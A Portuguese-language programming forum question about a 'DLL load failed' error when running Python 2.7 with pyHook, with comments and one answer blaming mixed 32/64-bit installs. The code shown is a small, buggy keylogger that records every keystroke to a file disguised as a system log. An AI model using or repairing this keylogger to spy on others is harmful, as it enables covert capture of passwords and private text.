# Erro ao executar python

Tags: python

Estou testando um código python e tenho as bibliotecas que ele usa, mas quando executo, da esse erro:

> ImportError: DLL load failed: %1 nÒo Ú um aplicativo Win32 vßlido.

A versão é a 64 bits.

Código:

```
import pyHook, pythoncom, sys, logging

file_log = 'C:\Users\usuario\Documents\systemlogpython.txt'

def OnKeyBoard(event):

   logging.basicConfig(filename=file_log, level=loggin.DEBUG, format='%(message)s')


   chr(event.Ascii)

   logging.log(10,chr(event.Ascii))

   return True


hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = OnKeyboardEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()
```

Comment: Qual é a versão do seu SO? e qual a versão do python instalada? ambas são iguais?

Comment: Windows 10 64 bits, e Python 2.7 tbm 64bits. Bibliotecas: win32 e PyHook

Comment: O erro é em alguma linha específica? Acontece no início da execução?

Answer (score -2):

Se você instalou uma versão do Python de 32 bits e depois posteriormente outra de 64 pode ser conflito nas variáveis de ambiente. Aconteceu um problema semelhante e tive que refazer a instalação do pyhton com limpeza dos registros do Windows e excluindo variáveis de ambiente que apontavam erroneamente para a instalação antiga.